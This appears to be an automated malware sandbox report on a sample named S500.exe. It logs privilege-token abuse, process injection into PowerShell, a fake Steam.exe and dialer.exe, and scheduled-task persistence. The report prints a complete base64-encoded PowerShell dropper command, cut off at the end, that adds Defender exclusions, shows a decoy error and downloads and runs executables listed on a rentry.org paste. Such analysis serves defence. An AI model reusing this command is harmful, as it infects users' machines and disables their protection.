N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf0.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\dialer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4808 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\S500.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4808 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\S500.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 684 wrote to memory of 1648 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 684 wrote to memory of 1648 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 684 wrote to memory of 4020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf0.exe
PID 684 wrote to memory of 4020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf0.exe
PID 684 wrote to memory of 4020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf0.exe
PID 684 wrote to memory of 4336 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf1.exe
PID 684 wrote to memory of 4336 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf1.exe
PID 684 wrote to memory of 4336 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf1.exe
PID 684 wrote to memory of 532 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf2.exe
PID 684 wrote to memory of 532 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf2.exe
PID 684 wrote to memory of 4268 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe
PID 684 wrote to memory of 4268 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe
PID 684 wrote to memory of 4268 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe
PID 4336 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf1.exe C:\Windows\system32\cmd.exe
PID 4336 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf1.exe C:\Windows\system32\cmd.exe
PID 2208 wrote to memory of 3468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 2208 wrote to memory of 3468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 2208 wrote to memory of 4740 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2208 wrote to memory of 4740 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4020 wrote to memory of 228 N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf0.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 4020 wrote to memory of 228 N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf0.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 4156 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Windows\system32\cscript.exe
PID 228 wrote to memory of 4156 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Windows\system32\cscript.exe
PID 228 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe
PID 228 wrote to memory of 3364 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Windows\system32\cscript.exe
PID 228 wrote to memory of 3364 N/A C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe C:\Windows\system32\cscript.exe
PID 1628 wrote to memory of 4404 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 1628 wrote to memory of 4404 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 532 wrote to memory of 400 N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf2.exe C:\Windows\system32\dialer.exe
PID 532 wrote to memory of 400 N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf2.exe C:\Windows\system32\dialer.exe
PID 532 wrote to memory of 400 N/A C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf2.exe C:\Windows\system32\dialer.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\S500.exe

"C:\Users\Admin\AppData\Local\Temp\S500.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAbAB3ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGEAdAByACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACAAIwA4ADEAOQA6ACAAQwBhAG4AbgBvAHQAIABzAHQAYQByAHQAIABkAHUAZQAgAHQAbwAgAG0AaQBzAHMAaQBuAGcAIABkAGUAcABlAG4AZABlAG4AYwBpAGUAcwAsACAAcABsAGUAYQBzAGUAIABpAG4AcwB0AGEAbABsACAAYQBsAGwAIAB0AGgAZQAgAGQAZQBwAGUAbgBkAGUAbgBjAGkAZQBzACAAcgBlAHEAdQBpAHIAZQBkAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGIAcQBzACMAPgA7ACIAOwA8ACMAZQBtAHYAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB1AGoAZgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB3AHcAeAAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAbgB0AHIAeQAuAG8AcgBnAC8AcABhAG4AYwBlAGsANgAxADEAMQAxADEAMQAxADEAMQAxADEAMQAxAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBtAGMAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGoAbQBpACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAZwBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwB2AGkAeAAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBz